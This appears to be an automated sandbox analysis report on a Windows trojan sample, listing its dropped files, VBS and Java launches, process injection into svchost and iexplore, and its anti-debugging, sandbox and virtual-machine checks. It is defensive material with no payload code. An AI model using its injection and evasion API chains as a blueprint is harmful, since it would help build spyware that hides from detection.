Source: C:\Users\user\AppData\Local\Temp\358saxio.exeFile read: C:\Windows\System32\drivers\etc\hosts
Sample file is different than original file name gathered from version infoShow sources
Source: sxz.exe, 00000001.00000002.14995935256.002F0000.00000008.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLL.MUIj% vs sxz.exe
Sample reads its own file contentShow sources
Source: C:\Users\user\Desktop\sxz.exeFile read: C:\Users\user\Desktop\sxz.exeJump to behavior
Searches the installation path of Mozilla FirefoxShow sources
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeRegistry key queried: HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox\43.0.1 (x86 en-US)\Main Install Directory
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)Show sources
Source: server.exe.2.drStatic PE information: Section: .rsrc ZLIB complexity 0.999469521605
Source: Server.exe.3.drStatic PE information: Section: .rsrc ZLIB complexity 0.999469521605
Classification labelShow sources
Source: classification engineClassification label: mal100.evad.expl.spyw.troj.winEXE@61/225@34/1
Contains functionality for error loggingShow sources
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_0042212C GetLastError,FormatMessageA,12_2_0042212C
Contains functionality to check free disk spaceShow sources
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeCode function: 12_2_004093C0 GetDiskFreeSpaceA,12_2_004093C0
Contains functionality to enum processes or threadsShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C83A54 CreateToolhelp32Snapshot,Process32FirstW,CharUpperW,CharUpperW,CharUpperW,CharUpperW,Process32NextW,CloseHandle,3_2_00C83A54
Contains functionality to load and extract PE file embedded resourcesShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C8406C FindResourceW,SizeofResource,LoadResource,LockResource,FreeResource,3_2_00C8406C
Creates files inside the user directoryShow sources
Source: C:\Users\user\Desktop\sxz.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Skype.exeJump to behavior
Creates temporary filesShow sources
Source: C:\Users\user\Desktop\sxz.exeFile created: C:\Users\user~1\AppData\Local\Temp\ope641.tmpJump to behavior
Executable is probably coded in javaShow sources
Source: C:\Users\user\Desktop\sxz.exeSection loaded: C:\Program Files\Java\jre1.8.0_40\bin\java.dllJump to behavior
Executes visual basic scriptsShow sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs
Launches a second explorer.exe instanceShow sources
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Source: unknownProcess created: C:\Windows\explorer.exe
Parts of this applications are using Borland Delphi (Probably coded in Delphi)Show sources
Source: C:\Users\user\Desktop\sxz.exeKey opened: HKEY_USERS\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeKey opened: HKEY_USERS\Software\Borland\Delphi\Locales
Reads ini filesShow sources
Source: C:\Users\user\Desktop\sxz.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Users\user\Desktop\sxz.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Sample is known by Antivirus (Virustotal or Metascan)Show sources
Source: sxz.exeVirustotal: hash found
Spawns processesShow sources
Source: unknownProcess created: C:\Users\user\Desktop\sxz.exe 'C:\Users\user\Desktop\sxz.exe'
Source: unknownProcess created: C:\Users\user\Desktop\sxz.exe C:\Users\user\Desktop\sxz.exe
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\server.exe 'C:\Users\user~1\AppData\Local\Temp\server.exe'
Source: unknownProcess created: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe 'C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe' -jar 'C:\Users\user~1\AppData\Local\Temp\uroi.jar'
Source: unknownProcess created: C:\Windows\System32\svchost.exe svchost.exe
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Roaming/Microsoft/Skype.exe
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Windows\InstallDir\Server.exe
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknownProcess created: C:\Program Files\Java\jre1.8.0_40\bin\java.exe 'C:\Program Files\Java\jre1.8.0_40\bin\java.exe' -jar C:\Users\user~1\AppData\Local\Temp\_0.71076688945376033550400146700531635.class
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Windows\InstallDir\Server.exe
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\358saxio.exe 'C:\Users\user~1\AppData\Local\Temp\358saxio.exe'
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknownProcess created: C:\Windows\InstallDir\Server.exe 'C:\Windows\InstallDir\Server.exe'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\358saxio.exe C:\Users\user~1\AppData\Local\Temp\358saxio.exe
Source: unknownProcess created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs
Source: unknownProcess created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs
Source: unknownProcess created: C:\Windows\explorer.exe explorer.exe C:\Users\user\AppData\Roaming/Microsoft/Skype.exe
Source: unknownProcess created: C:\Windows\explorer.exe C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
Source: unknownProcess created: C:\Windows\InstallDir\Server.exe 'C:\Windows\InstallDir\Server.exe'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs
Source: unknownProcess created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs
Source: unknownProcess created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs
Source: unknownProcess created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\358saxio.exe 'C:\Users\user~1\AppData\Local\Temp\358saxio.exe'
Source: unknownProcess created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\358saxio.exe C:\Users\user~1\AppData\Local\Temp\358saxio.exe
Source: unknownProcess created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: C:\Users\user\Desktop\sxz.exeProcess created: C:\Users\user\Desktop\sxz.exe C:\Users\user\Desktop\sxz.exeJump to behavior
Source: C:\Users\user\Desktop\sxz.exeProcess created: C:\Users\user\AppData\Local\Temp\server.exe 'C:\Users\user~1\AppData\Local\Temp\server.exe' Jump to behavior
Source: C:\Users\user\Desktop\sxz.exeProcess created: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe 'C:\Program Files\Java\jre1.8.0_40\bin\javaw.exe' -jar 'C:\Users\user~1\AppData\Local\Temp\uroi.jar' Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess created: C:\Windows\System32\svchost.exe svchost.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeProcess created: C:\Users\user\AppData\Local\Temp\358saxio.exe 'C:\Users\user~1\AppData\Local\Temp\358saxio.exe' Jump to behavior
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeProcess created: C:\Program Files\Java\jre1.8.0_40\bin\java.exe 'C:\Program Files\Java\jre1.8.0_40\bin\java.exe' -jar C:\Users\user~1\AppData\Local\Temp\_0.71076688945376033550400146700531635.classJump to behavior
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbsJump to behavior
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbsJump to behavior
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeProcess created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /eJump to behavior
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\InstallDir\Server.exe 'C:\Windows\InstallDir\Server.exe' Jump to behavior
Source: C:\Windows\System32\svchost.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs
Source: C:\Program Files\Java\jre1.8.0_40\bin\java.exeProcess created: C:\Windows\System32\xcopy.exe xcopy 'C:\Program Files\Java\jre1.8.0_40' 'C:\Users\user\AppData\Roaming\Oracle\' /e
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess created: C:\Users\user\AppData\Local\Temp\358saxio.exe C:\Users\user~1\AppData\Local\Temp\358saxio.exe
Source: C:\Windows\explorer.exeProcess created: C:\Windows\InstallDir\Server.exe 'C:\Windows\InstallDir\Server.exe'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5899708393590982329.vbs
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive4502924618821110619.vbs
Source: C:\Windows\InstallDir\Server.exeProcess created: C:\Program Files\Internet Explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe
Source: C:\Windows\InstallDir\Server.exeProcess created: C:\Users\user\AppData\Local\Temp\358saxio.exe 'C:\Users\user~1\AppData\Local\Temp\358saxio.exe'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive3783187546293847897.vbs
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript.exe C:\Users\user~1\AppData\Local\Temp\Retrive5306090169834682625.vbs
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess created: C:\Users\user\AppData\Local\Temp\358saxio.exe C:\Users\user~1\AppData\Local\Temp\358saxio.exe
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Users\user\Desktop\sxz.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
Uses Rich Edit ControlsShow sources
Source: C:\Windows\explorer.exeFile opened: C:\Windows\system32\MsftEdit.dllJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeKey opened: HKEY_USERS\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Submission file is bigger than most known malware samplesShow sources
Source: sxz.exeStatic file information: File size 2297344 > 1048576
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeFile opened: C:\Program Files\Java\jre1.8.0_40\bin\msvcr100.dllJump to behavior
PE file has a big raw sectionShow sources
Source: sxz.exeStatic PE information: Raw size of UPX1 is bigger than: 0x100000 < 0x22fa00

HIPS / PFW / Operating System Protection Evasion:

barindex
Allocates memory in foreign processesShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeMemory allocated: C:\Windows\System32\svchost.exe base: C80000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeMemory allocated: C:\Program Files\Internet Explorer\iexplore.exe base: C80000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\InstallDir\Server.exeMemory allocated: C:\Program Files\Internet Explorer\iexplore.exe base: C80000 protect: page execute and read and write
Contains functionality to inject code into remote processesShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C84600 CreateProcessW,Sleep,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,SetThreadContext,ResumeThread,3_2_00C84600
Contains functionality to inject threads in other processesShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle,3_2_00C83CE4
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle,3_1_00C83CE4
Source: C:\Windows\System32\svchost.exeCode function: 5_2_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle,5_2_00C83CE4
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 6_2_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle,6_2_00C83CE4
Source: C:\Windows\InstallDir\Server.exeCode function: 15_2_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle,15_2_00C83CE4
Source: C:\Windows\InstallDir\Server.exeCode function: 15_1_00C83CE4 GetModuleHandleA,VirtualFreeEx,VirtualAllocEx,GetModuleHandleA,WriteProcessMemory,CreateRemoteThread,CloseHandle,15_1_00C83CE4
Creates a thread in another existing process (thread injection)Show sources
Source: C:\Users\user\AppData\Local\Temp\server.exeThread created: C:\Windows\System32\svchost.exe EIP: C88EF8Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeThread created: C:\Program Files\Internet Explorer\iexplore.exe EIP: C88BC0Jump to behavior
Source: C:\Windows\InstallDir\Server.exeThread created: C:\Program Files\Internet Explorer\iexplore.exe EIP: C88BC0
Injects a PE file into a foreign processesShow sources
Source: C:\Users\user\Desktop\sxz.exeMemory written: C:\Users\user\Desktop\sxz.exe base: 400000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeMemory written: C:\Windows\System32\svchost.exe base: C80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeMemory written: C:\Program Files\Internet Explorer\iexplore.exe base: C80000 value starts with: 4D5AJump to behavior
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeMemory written: C:\Users\user\AppData\Local\Temp\358saxio.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\InstallDir\Server.exeMemory written: C:\Program Files\Internet Explorer\iexplore.exe base: C80000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeMemory written: C:\Users\user\AppData\Local\Temp\358saxio.exe base: 400000 value starts with: 4D5A
Modifies the context of a thread in another process (thread injection)Show sources
Source: C:\Users\user\Desktop\sxz.exeThread register set: target process: 3624Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeThread register set: target process: 2184
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeThread register set: target process: 2280
Writes to foreign memory regionsShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeMemory written: C:\Windows\System32\svchost.exe base: C80000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exeMemory written: C:\Program Files\Internet Explorer\iexplore.exe base: C80000Jump to behavior
Source: C:\Windows\InstallDir\Server.exeMemory written: C:\Program Files\Internet Explorer\iexplore.exe base: C80000

Anti Debugging:

barindex
Checks for debuggers (devices)Show sources
Source: C:\Windows\explorer.exeFile opened: C:\Windows\WinSxS\FileMaps\program_files_java_jre1.8.0_40_bin_dc0a9e79a9a08fab.cdf-ms
Source: C:\Windows\explorer.exeFile opened: C:\Windows\WinSxS\FileMaps\users_user_1_appdata_local_temp_78530b0c641b30d5.cdf-ms
Source: C:\Windows\explorer.exeFile opened: C:\Windows\WinSxS\FileMaps\$$_installdir_1a6c4aae522d2aa2.cdf-ms
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeSystem information queried: KernelDebuggerInformationJump to behavior
Checks if the current process is being debuggedShow sources
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess queried: DebugPortJump to behavior
Source: C:\Program Files\Internet Explorer\iexplore.exeProcess queried: DebugPort
Contains functionality to dynamically determine API callsShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C83D8C LoadLibraryA,GetProcAddress,FreeLibrary,3_2_00C83D8C
Contains functionality to read the PEBShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C88674 mov eax, dword ptr fs:[00000030h]3_2_00C88674
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C88760 mov eax, dword ptr fs:[00000030h]3_2_00C88760
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C886CC mov eax, dword ptr fs:[00000030h]3_2_00C886CC
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C88674 mov eax, dword ptr fs:[00000030h]3_1_00C88674
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C88760 mov eax, dword ptr fs:[00000030h]3_1_00C88760
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_1_00C886CC mov eax, dword ptr fs:[00000030h]3_1_00C886CC
Source: C:\Windows\System32\svchost.exeCode function: 5_2_00C88674 mov eax, dword ptr fs:[00000030h]5_2_00C88674
Source: C:\Windows\System32\svchost.exeCode function: 5_2_00C88760 mov eax, dword ptr fs:[00000030h]5_2_00C88760
Source: C:\Windows\System32\svchost.exeCode function: 5_2_00C886CC mov eax, dword ptr fs:[00000030h]5_2_00C886CC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 6_2_00C88674 mov eax, dword ptr fs:[00000030h]6_2_00C88674
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 6_2_00C88760 mov eax, dword ptr fs:[00000030h]6_2_00C88760
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: 6_2_00C886CC mov eax, dword ptr fs:[00000030h]6_2_00C886CC
Source: C:\Windows\explorer.exeCode function: 14_1_01B88674 mov eax, dword ptr fs:[00000030h]14_1_01B88674
Source: C:\Windows\explorer.exeCode function: 14_1_01B88760 mov eax, dword ptr fs:[00000030h]14_1_01B88760
Source: C:\Windows\explorer.exeCode function: 14_1_01B886CC mov eax, dword ptr fs:[00000030h]14_1_01B886CC
Source: C:\Windows\InstallDir\Server.exeCode function: 15_2_00C88674 mov eax, dword ptr fs:[00000030h]15_2_00C88674
Source: C:\Windows\InstallDir\Server.exeCode function: 15_2_00C88760 mov eax, dword ptr fs:[00000030h]15_2_00C88760
Source: C:\Windows\InstallDir\Server.exeCode function: 15_2_00C886CC mov eax, dword ptr fs:[00000030h]15_2_00C886CC
Source: C:\Windows\InstallDir\Server.exeCode function: 15_1_00C88674 mov eax, dword ptr fs:[00000030h]15_1_00C88674
Source: C:\Windows\InstallDir\Server.exeCode function: 15_1_00C88760 mov eax, dword ptr fs:[00000030h]15_1_00C88760
Source: C:\Windows\InstallDir\Server.exeCode function: 15_1_00C886CC mov eax, dword ptr fs:[00000030h]15_1_00C886CC
Contains functionality which may be used to detect a debugger (GetProcessHeap)Show sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: 3_2_00C823E8 GetProcessHeap,GetCurrentThreadId,3_2_00C823E8
Enables debug privilegesShow sources
Source: C:\Users\user\AppData\Local\Temp\358saxio.exeProcess token adjusted: Debug
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Program Files\Java\jre1.8.0_40\bin\javaw.exeMemory protected: page read and write and page guardJump to behavior

Malware Analysis System Evasion:

barindex
Found evasive API chain (may stop execution after checking mutex)Show sources
Source: C:\Windows\InstallDir\Server.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\server.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_3-9517
Source: C:\Users\user\AppData\Local\Temp\server.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_3-9564
Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_5-9467
Source: C:\Windows\InstallDir\Server.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Program Files\Internet Explorer\iexplore.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_6-9701
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)Show sources
Source: C:\Users\user\AppData\Local\Temp\server.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_3-10272
Source: C:\Windows\InstallDir\Server.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
Tries to detect sandboxes and other dynamic analysis tools (process name or module)Show sources
Source: server.exe, svchost.exe, iexplore.exe, explorer.exe, Server.exeBinary or memory string: SBIEDLL.DLL
Tries to detect virtual machinesShow sources
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: VBoxService.exe VBoxService.exe 3_2_00C881BC
Source: C:\Users\user\AppData\Local\Temp\server.exeCode function: VBoxService.exe VBoxService.exe 3_1_00C881BC
Source: C:\Windows\System32\svchost.exeCode function: VBoxService.exe VBoxService.exe 5_2_00C881BC
Source: C:\Program Files\Internet Explorer\iexplore.exeCode function: VBoxService.exe VBoxService.exe 6_2_00C881BC
Source: C:\Windows\InstallDir\Server.exeCode function: VBoxService.exe VBoxService.exe 15_2_00C881BC
Source: C:\Windows\InstallDir\Server.exeCode function: VBoxService.exe VBoxService.exe 15_1_00C881BC
Enumerates the file systemShow sources
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)Show sources
Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 834Jump to behavior
Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 627
Found dropped PE file which has not been started or loadedShow sources
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxwebkit.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\unpack200.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\wsdetect.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javacpl.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\sunmscapi.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\bci.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\plugin2\npjp2.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\ssv.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jfxmedia.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\prism_es2.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\glass.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\java_crw_demo.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jaas_nt.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jsound.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2native.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jli.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fontmanager.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\javafx_font.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\kinit.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\resource.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\dtplugin\npdeployJava1.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jabswitch.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jp2iexp.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\jjs.exeJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\fxplugins.dllJump to dropped file
Source: C:\Windows\System32\xcopy.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Oracle\bin\mlib_image.dllJump to dropped file
